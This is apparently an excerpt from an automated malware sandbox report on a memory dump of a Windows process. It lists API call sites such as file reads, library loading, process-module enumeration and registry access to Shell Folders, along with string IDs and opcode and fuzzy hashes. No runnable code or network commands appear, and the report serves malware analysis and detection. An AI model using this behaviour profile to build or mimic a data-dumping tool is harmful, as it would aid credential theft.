                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                    • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                    • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
• Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
• Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
• Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
• Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
• memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$??2@
• String ID:
• API String ID: 3700833809-0
• Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
• Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
• Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
• Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
• CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
• Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
• Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
• Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
• Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
APIs
• memset.MSVCRT ref: 004301AD
• memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset
• String ID:
• API String ID: 1297977491-0
• Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
• Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
• Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
• Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
APIs
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
• Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
• Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
• Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
• Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
• Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
• Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
APIs
• FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
